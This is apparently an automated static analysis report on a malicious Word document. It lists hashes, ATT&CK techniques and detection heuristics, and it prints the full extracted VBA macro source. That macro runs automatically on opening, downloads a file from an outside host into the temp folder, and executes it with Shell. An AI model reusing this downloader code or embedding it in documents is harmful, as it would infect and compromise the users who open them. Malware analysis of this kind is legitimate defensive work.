Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5ea8f2bc47e41360…

MALICIOUS

Office (OOXML)

301.5 KB Created: 2019-04-18 08:25:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-08-10
MD5: f602fa284a88acb77ddcfa000b2c640f SHA-1: e08bd5f56a250c1b343f2b8d367b26b011bd69e4 SHA-256: 5ea8f2bc47e41360d21cf7f3ec82ea0d61d70edf486dd295f02e80ff5735326c
198 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer

The sample contains a VBA macro that executes upon opening the document. This macro, named 'Document_Open', calls a function 'glisse' which in turn attempts to download a file using URLDownloadToFile from the URL 'https://colichneryzapparite.info/vchdnw9.tmp' and saves it to '%TEMP%\aws.css'. The script then attempts to execute this downloaded file via Shell. This indicates downloader or dropper functionality.

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Sub str2()
        Call Shell(spth(3))
    End Sub
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If VBA7 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
            Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
        glisse
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Function spth2() As String
        spth2 = Environ(tmp) + "\aws.css"
    End Function
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://colichneryzapparite.info/vchdnw9.tmp Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006 Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/ink Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3d Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/math Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing Referenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordml Referenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordml Referenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cid Referenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symex Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk Referenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordml Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape Referenced by macro
    • http://ns.adobe.com/xap/1.0/ Referenced by macro
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# Referenced by macro
    • http://purl.org/dc/elements/1.1/ Referenced by macro
    • http://ns.adobe.com/xap/1.0/mm/ Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# Referenced by macro
    • http://ns.adobe.com/photoshop/1.0/ Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2706 bytes
SHA-256: 35107f4dc68b6632ea134081caa513f5b9b9f7a4167e926dacfd24baae4c8487
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    glisse
End Sub

Attribute VB_Name = "Page1"
Public repeatCount As Integer
Sub glisse()
    fileSize = 0
    repeatCount = 0
start:
    On Error Resume Next
        dwn
        fileSize = FileLen(spth(3))
    On Error GoTo 0
    If fileSize = 0 Then
        If repeatCount < 10 Then
            repeatCount = repeatCount + 1
            GoTo start
        End If
    Else
        If IsNull(spth(3)) = False Then
            str 2, spth(3)
        End If
    End If
End Sub

Function spth2() As String
    spth2 = Environ(tmp) + "\aws.css"
End Function

Function tmp() As String
    If IsArray(123) = False Then
        tmp = Replace("tqqweqqwmqqwp", "qqw", "")
    End If
End Function

Attribute VB_Name = "Page2"
Function str(var1, var2)
    Select Case var1
        Case 1
            MsgBox "gertfvgdgdfg"
        Case 2
            If IsArray(var1) = False Then
                str2
            End If
        Case 3
            MsgBox "ertdecxg"
        Case Else
            MsgBox "erfhg45terfgdg"
    End Select
End Function

Function spth(var1) As String
    Select Case var1
        Case 1
            MsgBox "dffgjh4fdg"
        Case 2
            MsgBox "reue44fdfg"
        Case 3
            spth = spth2
        Case Else
            MsgBox "rtjh34r5gdfg"
    End Select
End Function

Function url(var1) As String
    If var1 = 1 Then
        url = "https://colichneryzapparite.info/vchdnw9.tmp"
    End If
End Function

Attribute VB_Name = "Page3"
#If VBA7 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If

Function dwn()
    Dim var1 As Integer
    var1 = 111
    If var1 = 111 Then
        URLDownloadToFile 0, url(1), spth(3), 0, 0
    End If
End Function

Sub str2()
    Call Shell(spth(3))
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 17920 bytes
SHA-256: a25cd5fda04e2bc5eea51feb46aca155d5260f97be946df63ea98cd09e501c87